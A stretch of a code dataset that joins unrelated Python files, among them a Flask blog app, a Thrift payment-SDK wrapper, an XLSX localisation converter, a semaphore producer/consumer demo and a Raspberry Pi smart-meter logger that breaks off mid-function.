def get_pages_by_missing_tags(*args):
tag_set = set(args)
pages_ = (p for p in pages if tag_set - set(p.meta.get('tags','')))
return sorted(pages_, reverse=True, key=lambda p: p.meta['date'])
def get_pages_sorted(sort_by='date', reverse=True, page_type='article'):
pages_ = (p for p in pages if p.meta.get('status','') == 'published' and p.meta.get('type','') == page_type)
return sorted(pages_, reverse=reverse, key=lambda p: p.meta[sort_by])
def get_related_pages(page):
"""
Get related pages by using overlapping tags.
"""
pass
@app.route('/')
def index():
index = get_pages_by_slug('index')
articles = get_pages_by_tags('geo')
other_articles = get_pages_by_tags('other')
return render_template('index.html', **locals())
@app.route('/articles/<slug>/')
def article(slug):
article = get_pages_by_slug(slug)
article_html = article.html.replace("%%THANKS%%", '<p class="thanks">Thanks for reading! Get in touch via <a href="https://twitter.com/kokoalberti">@kokoalberti</a> for any questions or comments. I also post new articles there when they are first published.</p>')
return render_template('article.html', **locals())
@app.route('/articles/<slug>/<path:filename>')
def article_static(slug, filename):
article = get_pages_by_slug(slug)
directory = os.path.dirname(safe_join(current_app.root_path, current_app.config.get("FLATPAGES_ROOT"), article.path))
return send_from_directory(directory, filename)
@app.route('/pages/<slug>/')
def page(slug):
page = get_pages_by_slug(slug)
return render_template('page.html', **locals())
@app.route('/tag/<tag>/')
def tag(tag):
articles = get_pages_by_tags(tag)
article = ''
return render_template('tag.html', **locals())
@app.route('/sitemap.xml')
def sitemap():
server_name = current_app.config.get("SITEMAP_SERVER_NAME")
articles = get_pages_sorted()
pages = get_pages_sorted(page_type='page')
index = get_pages_by_slug('index')
tags = set()
for article in articles:
for tag in article.meta.get("tags",[]):
tags.add(tag)
return Response(render_template('sitemap.xml', **locals()), mimetype='application/xml')
@app.route('/robots.txt')
def robots():
server_name = current_app.config.get("SITEMAP_SERVER_NAME")
return Response(render_template('robots.txt', **locals()), mimetype='text/plain')
@app.route('/google0e9a29b6ad0a512a.html')
def google_verification():
return render_template('google0e9a29b6ad0a512a.html')
@freezer.register_generator
def other_static_files():
"""
Register the URLs for the robots and sitemap routes to frozen flask
"""
yield 'robots', {}
yield 'sitemap', {}
yield 'google_verification', {}
@freezer.register_generator
def article_static_files():
"""
Register the URLS for article's static files (PNG images only for now) to
frozen flask.
"""
static_patterns = ("*.png", "*.jpg", "*.zip")
for p in pages:
directory = os.path.dirname(safe_join(current_app.root_path, current_app.config.get("FLATPAGES_ROOT"), p.path))
files = []
for pattern in static_patterns:
files.extend(glob.glob(os.path.join(directory, "**", pattern), recursive=True))
for static_file in files:
filename = static_file.replace(directory+'/', "")
yield 'article_static', {'slug':p.meta.get('slug'), 'filename':filename}
@app.cli.command()
def freeze():
print("Freezing...")
freezer.freeze()
| StarcoderdataPython |
138828 | <reponame>Next-Gen-UI/Code-Dynamics
class MyHashSet:
def __init__(self):
self.set = [False] * 1000001
def add(self, key: int) -> None:
self.set[key] = True
def remove(self, key: int) -> None:
self.set[key] = False
def contains(self, key: int) -> bool:
return self.set[key]
| StarcoderdataPython |
90079 | from handler.base_plugin import BasePlugin
class AutoSender(BasePlugin):
__slots__ = ("text", )
def __init__(self, text):
"""Answers with text `text` to user without any conditions."""
super().__init__()
self.text = text
async def check_message(self, msg):
return True
async def process_message(self, msg):
await msg.answer(self.text)
| StarcoderdataPython |
1785250 | """Wrapper class for WPWithin Service."""
import os
import time
import sys
import threading
from pkg_resources import resource_filename
import thriftpy
from thriftpy.rpc import make_client
from thriftpy.protocol.binary import TBinaryProtocolFactory
from thriftpy.transport.buffered import TBufferedTransportFactory
from .wpwithin_types import Error
from .converters import ConvertToThrift, ConvertFromThrift
from .launcher import run_rpc_agent, start_server
from .make_simple_server import make_simple_server
THRIFT_WPW_PATH = resource_filename(__name__, 'wpwithin.thrift')
wpw_thrift = thriftpy.load(THRIFT_WPW_PATH,
module_name="wpw_thrift",
include_dirs=[os.path.dirname(THRIFT_WPW_PATH)])
THRIFT_TYPES_PATH = resource_filename(__name__, 'wptypes.thrift')
wptypes_thrift = thriftpy.load(THRIFT_TYPES_PATH,
module_name="wptypes_thrift",
include_dirs=[os.path.dirname(THRIFT_TYPES_PATH)])
class WPWithin(object):
"""Wrapper class for thrift generated struct WPWithin."""
def __init__(self,
host,
port,
start_rpc=True,
rpc_dir=None,
start_callback_server=False,
callback_port=None,
event_listener=None):
"""Initialise WPWithin object.
host (integer): Client host
port (integer): Client port
(optional) start_rpc (boolean): Whether to start an rpc agent. Defaults to True.
(optional) rpc_dir: path to directory with rpc agent launchers. If not specified,
will search for the files in ./wpw-bin/ and $WPW_HOME/bin, in that order.
(optional) start_callback_server (boolean): Whether to start a callback server.
Defaults to False. If True, callback_port and event_listener must be specified.
(optional) callback_port (integer): port to listen for callback events
(optional) event_listener: instance of a class which implements AbstractEventListener.
"""
if start_callback_server and (callback_port is None or event_listener is None):
raise ValueError('No callback port or listener provided')
if start_rpc:
self._rpc = run_rpc_agent(port,
rpc_dir,
start_callback_server,
callback_port)
time.sleep(1)
self._thrift_client = make_client(wpw_thrift.WPWithin,
host=host,
port=port,
proto_factory=TBinaryProtocolFactory(),
trans_factory=TBufferedTransportFactory())
if start_callback_server:
self._server = make_simple_server(wpw_thrift.WPWithinCallback,
event_listener,
host=host,
port=callback_port)
self._server_thread = threading.Thread(target=start_server,
args=([self._server]))
self._server_thread.daemon = True
self._server_thread.start()
def shutdown(self):
"""Close all processes started."""
self._thrift_client.close()
if hasattr(self, '_server'):
self._server.close()
if hasattr(self, '_rpc'):
self._rpc.kill()
sys.exit(0)
def setup(self, name, description):
"""Setup the thrift client."""
try:
self._thrift_client.setup(name, description)
except wptypes_thrift.Error as err:
raise Error(err.message)
def add_service(self, svc):
"""Add service svc to the client.
svc: instance of Service.
"""
service = ConvertToThrift.service(svc)
try:
self._thrift_client.addService(service)
except wptypes_thrift.Error as err:
raise Error(err.message)
def remove_service(self, svc):
"""Remove service svc to the client.
svc: instance of Service.
"""
service = ConvertToThrift.service(svc)
try:
self._thrift_client.removeService(service)
except wptypes_thrift.Error as err:
raise Error(err.message)
def init_consumer(self,
scheme,
hostname,
port,
url_prefix,
client_id,
hce_card,
psp_config):
"""Initialise a consumer on the client.
hce_card: instance of HCECard
psp_config: Payment Service Provider details.
Must include psp_name and api_endpoint. Example:
{
"psp_name": "worldpayonlinepayments",
"api_endpoint": "https://api.worldpay.com/v1",
}
For more details see:
https://github.com/WPTechInnovation/worldpay-within-sdk/wiki/Worldpay-Total-US-(SecureNet)-Integration#usage
"""
card = ConvertToThrift.hce_card(hce_card)
try:
self._thrift_client.initConsumer(scheme,
hostname,
port,
url_prefix,
client_id,
card,
psp_config)
except wptypes_thrift.Error as err:
raise Error(err.message)
def init_producer(self, psp_config):
"""Initialise a producer on the client.
psp_config: Payment Service Provider details. For details see:
https://github.com/WPTechInnovation/worldpay-within-sdk/wiki/Worldpay-Total-US-(SecureNet)-Integration#usage
"""
try:
self._thrift_client.initProducer(psp_config)
except wptypes_thrift.Error as err:
raise Error(err.message)
def get_device(self):
return ConvertFromThrift.device(self._thrift_client.getDevice())
def start_service_broadcast(self, timeout_ms):
"""Start broadcasting services added to client.
If timeout_ms=0, broadcasts indefinetely.
"""
try:
self._thrift_client.startServiceBroadcast(timeout_ms)
except wptypes_thrift.Error as err:
raise Error(err.message)
def stop_service_broadcast(self):
try:
self._thrift_client.stopServiceBroadcast()
except wptypes_thrift.Error as err:
raise Error(err.message)
def device_discovery(self, timeout_ms):
"""Return list of ServiceMessage found on the network."""
try:
service_messages = self._thrift_client.deviceDiscovery(timeout_ms)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
svc_messages = []
for val in service_messages:
svc_messages.append(ConvertFromThrift.service_message(val))
return svc_messages
def request_services(self):
"""Return list of ServiceDetails found on the network."""
try:
service_details = self._thrift_client.requestServices()
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
svc_details = []
for val in service_details:
svc_details.append(ConvertFromThrift.service_details(val))
return svc_details
def get_service_prices(self, service_id):
"""Return list of Price for specified service."""
try:
prices = self._thrift_client.getServicePrices(service_id)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
wprices = []
for val in prices:
wprices.append(ConvertFromThrift.price(val))
return wprices
def select_service(self, service_id, number_of_units, price_id):
"""Send request to buy number_of_units of service_id at price_id.
Return TotalPriceResponse, to be used as argument for WPWithin.make_payment.
"""
try:
service = self._thrift_client.selectService(service_id, number_of_units, price_id)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
return ConvertFromThrift.total_price_response(service)
def make_payment(self, request):
"""Pay for service.
request: TotalPriceResponse returned from WPWithin.select_service.
"""
trequest = ConvertToThrift.total_price_response(request)
try:
response = self._thrift_client.makePayment(trequest)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
return ConvertFromThrift.payment_response(response)
def begin_service_delivery(self, service_id, service_delivery_token, units_to_supply):
token = ConvertToThrift.service_delivery_token(service_delivery_token)
try:
token_received = self._thrift_client.beginServiceDelivery(
service_id,
token,
units_to_supply)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
return ConvertFromThrift.service_delivery_token(token_received)
def end_service_delivery(self, service_id, service_delivery_token, units_received):
token = ConvertToThrift.service_delivery_token(service_delivery_token)
try:
token_received = self._thrift_client.endServiceDelivery(service_id,
token,
units_received)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
return ConvertFromThrift.service_delivery_token(token_received)
| StarcoderdataPython |
3227209 | <filename>projecteuler/fastdoublingfib.py
def _fib(n):
if n==0:
return (0, 1)
else:
a, b = _fib(n//2)
c = a * (b * 2 - a)
d = a * a + b * b
if n % 2 == 0:
return(c, d)
else:
return(d, c + d)
print(200)
end = time.time()
print(end-start) | StarcoderdataPython |
30158 | <reponame>capellaspace/console-client<filename>tests/test_search.py<gh_stars>10-100
#!/usr/bin/env python
import pytest
from .test_data import get_search_test_cases, search_catalog_get_stac_ids
from capella_console_client import client
from capella_console_client.validate import _validate_uuid
from capella_console_client.search import _paginated_search
@pytest.mark.parametrize("search_args,expected", get_search_test_cases())
def test_search(search_args, expected, search_client):
search_client.search(**search_args)
assert client._paginated_search.call_args[0][1] == expected
def test_validate_uuid_raises():
with pytest.raises(ValueError):
_validate_uuid("123")
def test_paginated_search_single_page(single_page_search_client):
results = _paginated_search(single_page_search_client._sesh, payload={"limit": 1})
assert len(results) == 1
assert results[0] == search_catalog_get_stac_ids()["features"][0]
def test_paginated_search_multi_page(multi_page_search_client):
results = _paginated_search(multi_page_search_client._sesh, payload={"limit": 10})
assert len(results) == 10
| StarcoderdataPython |
1629385 | <gh_stars>0
#!/usr/bin/python
# -*- coding: utf-8 -*-
import openpyxl
import os, sys, shutil
import json
from datetime import datetime
from optparse import OptionParser
config = {}
def row_to_data(row):
data = {
'label': row[config['label']].value,
'file': row[config['file']].value,
'translations': {}
}
for key in config['translations'].keys():
data['translations'][key] = row[config['translations'][key]].value
return data
class File:
def __init__(self, id):
self.idd = id
self.labels = []
def add_label(self, label):
self.labels.append(label)
def format(self, language):
file_format = '<?xml version="1.0" encoding="utf-8"?>\n<resources>\n\n'
for label in self.labels:
label_format = label.format(language)
if label_format:
file_format += "%s\n" % label.format(language)
file_format += "\n\n</resources>"
return file_format
class Label:
def __init__(self, id):
self.idd = id
self.translations = {}
def add_translation(self, language, translation):
self.translations[language] = translation
def format(self, language):
if not self.translations[language]:
return None
if not self.translations[language].startswith('['):
return '<string name="%s">%s</string>' % (self.idd, self.__ap(self.translations[language]))
else:
items_string = ""
for item in self.translations[language].replace("[", "").replace("]", "").split(","):
items_string += "\t<item>%s</item>\n" % self.__ap(item)
array_string = '<string-array name="%s">\n%s</string-array>' % (self.idd, items_string)
return array_string
def __ap(self, item):
return item.replace("\'", "\\\'").replace("\"", "\\\"")
def validate_data(data):
if data['file'] and data['file'].endswith(".xml") and data['label']:
return True
return False
def create_label_from_data(data):
label = Label(data['label'])
for k in data['translations'].keys():
label.add_translation(k, data['translations'][k])
return label
def main():
usage = "Usage: %prog [options] path_file.xlsx"
parser = OptionParser(usage=usage)
parser.add_option( "-c", "--config-file", dest="config_file",
default="config.json", help="Configuration file" )
(options, args) = parser.parse_args()
if len(args) == 0:
parser.print_usage()
exit(0)
if len(args) == 1:
filename = args[0]
if not os.path.exists(filename):
print "Error! %s xlsx file doesn't exist" % config_file
exit(0)
config_file = options.config_file
if not os.path.exists(config_file):
print "Error! %s configuration file doesn't exist" % config_file
exit(0)
f = open(config_file, "r")
json_file_content = f.read()
print json_file_content
global config
config = json.loads(json_file_content)
default = config['default']
files = {}
print ""
print "+++++++++++++++++++++++++++"
print "+ XLSXI18N +"
print "+++++++++++++++++++++++++++"
print ""
print "Reading %s..." % filename
workbook = openpyxl.load_workbook(filename)
worksheet = workbook.get_sheet_by_name('Languages')
for row in worksheet.rows:
data = row_to_data(row)
if validate_data(data):
file_name = data['file']
if not file_name in files:
files[file_name] = File(file_name)
label = create_label_from_data(data)
files[file_name].add_label(label)
try:
if os.path.exists("res"):
dest_folder = "backup_res_%s" % datetime.now().strftime('%Y%m%d_%H%M%S')
print "Backing up 'res' folder into '%s'" % dest_folder
shutil.copytree("res", dest_folder)
except OSError:
pass
print "Writing files..."
for k in data['translations'].keys():
if default == k:
folder = os.path.join("res", "values")
else:
folder = os.path.join("res", "values-%s" % k)
if not os.path.exists(folder):
os.makedirs(folder)
for file_k in files.keys():
f = open(os.path.join(folder, file_k), "w")
f.write(files[file_k].format(k).encode('utf8'))
print "End"
if __name__ == "__main__":
main() | StarcoderdataPython |
3262000 | import requests
from requests.auth import HTTPBasicAuth
from .errors import *
from .config import config as target_config
class TargetApiClient(object):
def __init__(self, account_sid, access_token):
self.config = target_config
self.set_config({
'account_sid': account_sid,
'access_token': access_token
})
def set_config(self, config):
self.config.update(config)
def call(self, resource, params):
if 'account_sid' not in self.config:
raise TargetApiParameterNotImplementedError(parameter='account_sid')
if 'access_token' not in self.config:
raise TargetApiParameterNotImplementedError(parameter='access_token')
if not self._validate_parameters(params):
raise TargetApiParamsError()
response = self._make_call(resource, params)
if response.status_code != 200:
# Process errors
if response.status_code == 400:
raise TargetApiBadRequestError()
elif response.status_code == 401:
raise TargetApiUnauthorizedError()
elif response.status_code == 404:
raise TargetApiNotFoundError()
elif response.status_code == 405:
raise TargetApiMethodNotAllowedError()
elif response.status_code == 500:
raise TargetApiServerError()
elif response.status_code == 503:
raise TargetApiServiceUnavailableError()
else:
raise TargetApiUnknownError()
if response.headers['content-type'].find('application/json') != -1:
return response.json()
return response.content
def _make_call(self, resource, params):
return requests.get(
self._generate_url(resource),
params=params,
auth=HTTPBasicAuth(self.config['account_sid'], self.config['access_token'])
)
@classmethod
def _validate_parameters(cls, params):
if 'Query' not in params:
return False
return True
def _generate_url(self, resource_name):
if 'base_url' not in self.config:
raise TargetApiParameterNotImplementedError(parameter='base_url')
if 'account_sid' not in self.config:
raise TargetApiParameterNotImplementedError(parameter='account_sid')
return self.config['base_url']\
.replace('{AccountSID}', self.config['account_sid'])\
.replace('{ResourceName}', resource_name)
| StarcoderdataPython |
1678355 | <reponame>luminousmen/grokking_concurrency
#!/usr/bin/env python3
"""Implementing parking garage using semaphore for control critical section"""
import time
from threading import Thread, Semaphore
CAPACITY = 5
# shared memory
BUFFER = ["" for i in range(CAPACITY)]
mutex = Semaphore()
empty = Semaphore(CAPACITY)
full = Semaphore(0)
producer_idx = 0
class Producer(Thread):
def __init__(self, name: str, items_amount: int = 5):
super().__init__()
self.counter = 0
self.name = name
self.items_amount = items_amount
def next_index(self, producer_idx) -> int:
return (producer_idx + 1) % CAPACITY
def run(self):
global producer_idx
while self.counter < self.items_amount:
empty.acquire()
mutex.acquire()
self.counter += 1
BUFFER[producer_idx] = f"{self.name}-{self.counter}"
print(f"{self.name} produced: `{BUFFER[producer_idx]}`")
producer_idx = self.next_index(producer_idx)
mutex.release()
full.release()
# simulating some real action here
time.sleep(1)
class Consumer(Thread):
def __init__(self, name: str, items_amount: int = 10):
super().__init__()
self.name = name
self.idx = 0
self.counter = 0
self.items_amount = items_amount
def next_index(self):
return (self.idx + 1) % CAPACITY
def run(self):
while self.counter < self.items_amount:
full.acquire()
mutex.acquire()
item = BUFFER[self.idx]
print(f"{self.name} consumed item: `{item}`")
self.idx = self.next_index()
self.counter += 1
mutex.release()
empty.release()
# simulating some real action here
time.sleep(2)
if __name__ == "__main__":
threads = [
Producer("John"),
Producer("Sara"),
Consumer("Bob")
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
| StarcoderdataPython |
173914 | <filename>storemanager/users/admin.py
from django.contrib import admin
from .models import User,UserProfile
admin.site.register(User)
admin.site.register(UserProfile)
| StarcoderdataPython |
1655519 | <reponame>yawatajunk/Wi-Sun_EnergyMeter<filename>sem_com.py
#!/usr/bin/python3
# coding: UTF-8
import argparse
import binascii
import datetime
import glob
import json
import threading
import time
import os
import pickle
import socket
import sys
import RPi.GPIO as gpio
from y3module import Y3Module
from echonet_lite import *
import user_conf
# 定数定義
Y3RESET_GPIO = 18 # Wi-SUNリセット用GPIO
LED_GPIO = 4 # LED用GPIO
# ログファイル関連
TMP_LOG_DIR = '/tmp/' # 一次ログディレクトリ
LOG_DIR = 'sem_app/public/logs/' # ログ用ディレクトリ, 本スクリプトからの相対パス
SOCK_FILE = TMP_LOG_DIR + 'sem.sock' # UNIXソケット
TMP_LOG_FILE = TMP_LOG_DIR + 'sem.csv' # 一時ログファイル
POW_DAYS_JSON_FILE = LOG_DIR + 'pow_days.json' # JSON形式の電力ログファイル
POW_DAY_LOG_HEAD = 'pow_day_' # 日別ログファイル名の先頭
POW_DAY_LOG_FMT = '%Y%m%d' # 日時フォーマット
CURR_POW_FILE = TMP_LOG_DIR + 'curr_pow.txt'
# 低圧スマート電力量計 情報保存用リスト
sem_info = {}
def gpio_init():
"""GPIO初期化"""
gpio.setwarnings(False)
gpio.setmode(gpio.BCM)
gpio.setup(Y3RESET_GPIO, gpio.OUT)
gpio.setup(LED_GPIO, gpio.OUT)
gpio.output(Y3RESET_GPIO, gpio.HIGH)
time.sleep(0.1)
gpio.output(LED_GPIO, gpio.LOW)
class LedThread(threading.Thread):
"""LEDを点滅させるスレッド"""
def __init__(self):
super().__init__()
self._trigger = False
self._termFlag = False
def run(self):
while not self._termFlag:
if self._trigger:
self.ledon(True)
time.sleep(0.3)
self.ledon(False)
self._trigger = False
else:
time.sleep(0.1)
@staticmethod
def ledon(ctl):
if ctl:
gpio.output(LED_GPIO, gpio.HIGH)
else:
gpio.output(LED_GPIO, gpio.LOW)
def oneshot(self):
self._trigger = True
def terminate(self):
self._termFlag = True
self.join()
def y3reset():
"""Wi-Sunモジュールのリセット"""
gpio.output(Y3RESET_GPIO, gpio.LOW) # high -> low -> high
time.sleep(0.5)
gpio.output(Y3RESET_GPIO, gpio.HIGH)
time.sleep(2.0)
class Y3ModuleSub(Y3Module):
"""Y3Module()のサブクラス"""
global sem_inf_list
def __init__(self):
super().__init__()
self.EHD = '1081'
self.ECV_INF = '73' # ECHONET ECVコード (INF)
# UART受信スレッドrun()をECHONET Lite電文用に拡張
# UART受信用スレッド
def run(self):
while not self.term_flag:
msg = self.read()
if msg:
msg_list = self.parse_message(msg)
# debug: UDP(PANA)の受信
if msg_list['COMMAND'] == 'ERXUDP' and msg_list['LPORT'] == self.Y3_UDP_PANA_PORT:
sys.stdout.write('[PANA]: {}\n'.format(msg_list['DATA']))
# スマートメーターが自発的に発するプロパティ通知
if msg_list['COMMAND'] == 'ERXUDP' and msg_list['DATA'][0:4] == self.EHD \
and msg_list['DATA'][20:22] == self.ECV_INF:
sem_inf_list.append(msg_list)
elif self.search['search_words']: # サーチ中である
# サーチワードを受信した。
search_words = self.search['search_words'][0]
if isinstance(search_words, list):
for word in search_words:
if msg_list['COMMAND'].startswith(word):
self.search['found_word_list'].append(msg_list)
self.search['search_words'].pop(0)
break
elif msg_list['COMMAND'].startswith(search_words):
self.search['found_word_list'].append(msg_list)
self.search['search_words'].pop(0)
elif self.search['ignore_intermidiate']:
pass # 途中の受信データを破棄
else: # サーチワードではなかった
self.enqueue_message(msg_list)
else: # サーチ中ではない
self.enqueue_message(msg_list)
elif self.search['timeout']: # read()がタイムアウト,write()でタイムアウトが設定されている
if time.time() - self.search['start_time'] > self.search['timeout']:
self.search['found_word_list'] = []
self.search['search_words'] = []
self.search['timeout'] = 0
def sem_get(epc):
"""プロパティ値要求 'Get' """
global tid_counter
frame = sem.GET_FRAME_DICT['get_' + epc]
tid_counter = tid_counter + 1 if tid_counter + 1 != 65536 else 0 # TICカウントアップ
frame = sem.change_tid_frame(tid_counter, frame)
res = y3.udp_send(1, ip6, True, y3.Y3_UDP_ECHONET_PORT, frame)
def sem_get_getres(epc):
"""プロパティ値要求 'Get', 'GetRes'受信
epc: EHONET Liteプロパティ
"""
sem_get(epc) # 'Get'送信
start = time.time()
while True:
if y3.get_queue_size(): # データ受信
msg_list = y3.dequeue_message() # 受信データ取り出し
if msg_list['COMMAND'] == 'ERXUDP':
parsed_data = sem.parse_frame(msg_list['DATA'])
if parsed_data:
if parsed_data['tid'] != tid_counter:
errmsg = '[Error]: ECHONET Lite TID mismatch\n'
sys.stdout.write(errmsg)
return False
else:
return msg_list['DATA']
else:
sys.stdout.write('[Error]: ECHONET Lite frame error.\n')
return False
else:
sys.stdout.write('[Error]: Unknown data received.\n')
return False
else: # データ未受信
if time.time() - start > 20: # タイムアウト 20s
sys.stdout.write('[Error]: Time out.\n')
return False
time.sleep(0.01)
def sem_seti(epc, edt):
"""プロパティ値書き込み要求(応答要) 'SetI'
---------------------------------
(注)未検証 (注)未検証 (注)未検証
---------------------------------
epc: Echonet Liteプロパティ(bytes)
edt: Echonet Liteプロパティ値データ(bytes)
return: True(成功) / False(失敗)"""
global tid_counter
tid_counter = tid_counter + 1 if tid_counter + 1 != 65536 else 0 # TICカウントアップ
ptys = [[epc, edt]]
frame = sem.make_frame(tid_counter, sem.ESV_CODE['setc'], ptys)
res = y3.udp_send(1, ip6, True, y3.Y3_UDP_ECHONET_PORT, frame)
start = time.time()
while True:
if y3.get_queue_size(): # データ受信
msg_list = y3.dequeue_message() # 受信データ取り出し
if msg_list['COMMAND'] == 'ERXUDP':
parsed_data = sem.parse_frame(msg_list['DATA'])
if parsed_data:
if parsed_data['tid'] != tid_counter:
errmsg = '[Error]: ECHONET Lite TID mismatch\n'
sys.stdout.write(errmsg)
return False
else:
return msg_list['DATA']
else:
sys.stdout.write('[Error]: ECHONET Lite frame error.\n')
return False
else:
sys.stdout.write('[Error]: Unknown data received.\n')
return False
else: # データ未受信
if time.time() - start > 20: # タイムアウト 20s
sys.stdout.write('[Error]: Time out.\n')
return False
time.sleep(0.01)
def pow_logfile_init(dt):
"""電力ログファイル初期設定"""
f = open(TMP_LOG_FILE , 'w') # 一時ログ初期化
f.close()
if not (os.path.isdir(LOG_DIR) and os.access(LOG_DIR, os.W_OK)): # ログ用ディレクトリ確認
return False
csv_day_files = [] # 10日分のログファイルリスト(CSV)
pkl_day_files = [] # (pickle)
for i in range(10): # 10日分の電力ログ作成
t = dt - datetime.timedelta(days = i) # 対象日のdatetime
# ログファイル名
dt_str = t.strftime(POW_DAY_LOG_FMT)
csv_filename = LOG_DIR + POW_DAY_LOG_HEAD + dt_str + '.csv'
pkl_filename = TMP_LOG_DIR + POW_DAY_LOG_HEAD + dt_str + '.pickle'
csv_day_files.append(csv_filename)
pkl_day_files.append(pkl_filename)
if not os.path.exists(csv_filename): # 電力ログ(CSV)が無かったら作成する
try:
fcsv = open(csv_filename, 'w')
fcsv.close()
except:
return False
if not os.path.exists(pkl_filename): # 電力ログ(pickle)が無かったら作成する
result = csv2pickle(csv_filename, pkl_filename, t)
if not result:
return False
files = glob.glob(LOG_DIR + POW_DAY_LOG_HEAD + '*.csv') # 電力ログ(CSV)検索
for f in files:
if f in csv_day_files:
continue
else:
os.remove(f) # 古い電力ログ(CSV)を削除
files = glob.glob(TMP_LOG_DIR + POW_DAY_LOG_HEAD + '*.pickle') # 電力ログ(pickle)検索
for f in files:
if f in pkl_day_files:
continue
else:
os.remove(f) # 古い電力ログ(pickle)を削除
# CSVファイルをJSONファイルに変換
pickle2json(sorted(pkl_day_files), POW_DAYS_JSON_FILE)
return True
def pow_logfile_maintainance(last_dt, new_dt):
"""電力ログファイル更新"""
if last_dt.minute != new_dt.minute and new_dt.minute % 10 == 0: # 10分毎
dt_str = last_dt.strftime(POW_DAY_LOG_FMT)
today_csv_file = LOG_DIR + POW_DAY_LOG_HEAD + dt_str + '.csv'
today_pkl_file = TMP_LOG_DIR + POW_DAY_LOG_HEAD + dt_str + '.pickle'
file_cat(today_csv_file, TMP_LOG_FILE)
os.remove(TMP_LOG_FILE) # 一時ログファイルを削除
csv2pickle(today_csv_file, today_pkl_file, last_dt) # pickle更新
if last_dt.day != new_dt.day: # 日付変更
pow_logfile_init(new_dt) # 電力ログ初期化
else:
pkl_day_files = glob.glob(TMP_LOG_DIR + POW_DAY_LOG_HEAD + '*.pickle') # 電力ログ(pickle)検索
pickle2json(sorted(pkl_day_files), POW_DAYS_JSON_FILE) # CSVファイルをJSONファイルに変換
def file_cat(file_a, file_b):
"""ファイルを連結する"""
try:
fp_a = open(file_a, 'ab')
fp_b = open(file_b, 'rb')
fp_a.write(fp_b.read())
fp_a.close()
fp_b.close()
return True
except:
return False
def csv2pickle(csvfile, pklfile, dt):
"""csvファイルをpickleファイルに変換"""
try:
fcsv = open(csvfile, 'r')
fpkl = open(pklfile, 'wb')
data = fcsv.readlines()
except:
return False
if data == []: # 新規作成のよりcsvファイルが空の場合
# 引数dt(datetime型)から、0時0分のタイムスタンプを作成
ts_origin = datetime.datetime.combine(dt, datetime.time(0, 0)).timestamp()
else:
ts = int(data[0].strip().split(',')[0]) # ログからタイムスタンプを取得
dt = datetime.datetime.fromtimestamp(ts) # 0時0分のタイムスタンプを作成
ts_origin = datetime.datetime(dt.year, dt.month, dt.day).timestamp()
data_work = [[None, []] for row in range(60 * 24)] # 作業用空箱
for minute in range(60 * 24):
data_work[minute][0] = ts_origin + 60 * minute # 1分刻みのタイムスタンプを設定
for row in data:
row_list = row.strip().split(',') # [タイムスタンプ(s), 電力]
if row_list[1] != 'None':
minute = int((int(row_list[0]) - ts_origin) / 60) # 00:00からの経過時間[分]
if minute > 0 and minute < 60 * 24:
data_work[minute][1].append(int(row_list[1])) # 電力を追加
data_summary = [[None, None] for row in range(60 * 24)] # 集計用空箱
for minute, data in enumerate(data_work):
data_summary[minute][0] = data[0]
if len(data[1]):
data_summary[minute][1] = round(sum(data[1]) / len(data[1])) # 電力平均値
pickle.dump(data_summary, fpkl)
fcsv.close()
fpkl.close()
return True
def pickle2json(pklfiles, jsonfile):
"""pickleファイルをJSONファイルに変換する"""
data = []
for fpkl in pklfiles:
try:
f = open(fpkl, 'rb')
d = pickle.load(f)
data = data + d
except:
return False
json_data = []
for row in data:
row = [int(row[0])*1000, None if row[1] is None else int(row[1])]
json_data.append(row)
s = json.dumps(json_data)
try:
f = open(jsonfile, 'w')
f.write(s)
f.close()
return True
except:
return False
# コマンドライン引数
def arg_parse():
p = argparse.ArgumentParser()
p.add_argument('-d', '--delay', help='This script starts after a delay of [n] seconds.', default=0, type=int)
args = p.parse_args()
return args
if __name__ == '__main__':
args = arg_parse()
if args.delay: # スクリプトをスタートするまでの待ち時間。sem_appとの連携時にsem_com.pyのスタートを遅らせる。
if isinstance(args.delay, int):
ws = args.delay
sys.stdout.write('Waiting for {} seconds...\n'.format(ws))
time.sleep(ws)
os.chdir(os.path.dirname(os.path.abspath(__file__)))
sem_inf_list = [] # スマートメータのプロパティ通知用
tid_counter = 0 # TIDカウンタ
pana_ts = 0.0 # PANA認証時のタイムスタンプを記録
saved_dt = datetime.datetime.now() # 現在日時を保存
sys.stdout.write('Log files setup...\n')
result = pow_logfile_init(saved_dt) # ログファイル初期化
if not result:
sys.stdout.write('[Error]: Log file error\n')
sys.exit(-1)
gpio_init()
led = LedThread()
led.start()
led.oneshot()
y3 = Y3ModuleSub()
y3.uart_open(dev='/dev/ttyAMA0', baud=115200, timeout=1)
y3.start()
sys.stdout.write('Wi-SUN reset...\n')
y3reset()
y3.set_echoback_off()
y3.set_opt(True)
y3.set_password(user_conf.SEM_PASSWORD)
y3.set_routeb_id(user_conf.SEM_ROUTEB_ID)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(SOCK_FILE)
except:
sock = None
channel_list = []
sem_exist = False
for i in range(10):
sys.stdout.write('({}/10) Active scan with a duration of {}...\n'.format(i+1, user_conf.SEM_DURATION))
channel_list = y3.active_scan(user_conf.SEM_DURATION)
if channel_list is False: # active_scan()をCtrl+cで終了したとき
break
if channel_list:
sem_exist = True
break
if not sem_exist: # スキャン失敗
sys.stdout.write('[Error]: Can not connect to a smart energy meter\n')
if sem_exist:
ch = channel_list[0]
sys.stdout.write('Energy Meter: [Ch.0x{:02X}, Addr.{}, LQI.{}, PAN.0x{:04X}]\n'.format(ch['Channel'],
ch['Addr'], ch['LQI'], ch['Pan ID']))
# チャンネル設定
y3.set_channel(ch['Channel'])
sys.stdout.write('Set channel to 0x{:02X}\n'.format(ch['Channel']))
# スマートメータのIP6アドレス
ip6 = y3.get_ip6(ch['Addr'])
sys.stdout.write('IP6 address is \'{}\'\n'.format(ip6))
# PAN ID
y3.set_pan_id(ch['Pan ID'])
sys.stdout.write('Set PAN ID to 0x{:04X}\n'.format(ch['Pan ID']))
# PANA認証(PaC)
sem_exist = False
pana_done = False
for i in range(10):
sys.stdout.write('({}/10) PANA connection...\n'.format(i+1))
sem_exist = y3.start_pac(ip6)
if sem_exist: # インスタンスリスト通知の受信待ち
st = time.time()
while True:
if sem_inf_list:
